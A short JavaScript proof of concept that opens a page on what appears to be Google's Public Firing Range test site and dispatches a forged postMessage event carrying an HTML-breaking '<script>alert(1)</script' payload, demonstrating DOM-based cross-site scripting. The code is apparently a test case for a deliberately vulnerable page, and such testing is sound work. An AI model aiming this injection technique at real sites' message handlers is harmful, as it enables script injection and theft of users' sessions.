/* eslint-disable */
function sleep(ms) {
  return new Promise(resolve => setTimeout(resolve, ms));
}
/* eslint-disable */
async function demo() {
  var x = window.open(
"https://public-firing-range.appspot.com/dom/toxicdom/postMessage/complexMessageDocumentWriteEval");
  var e = new Event('message');
  e.data = JSON.parse('{"action":"addImage","source":"><script>alert(1)</script"}');
  await sleep(2000);
  x.dispatchEvent(e);
}
/* eslint-disable */
demo();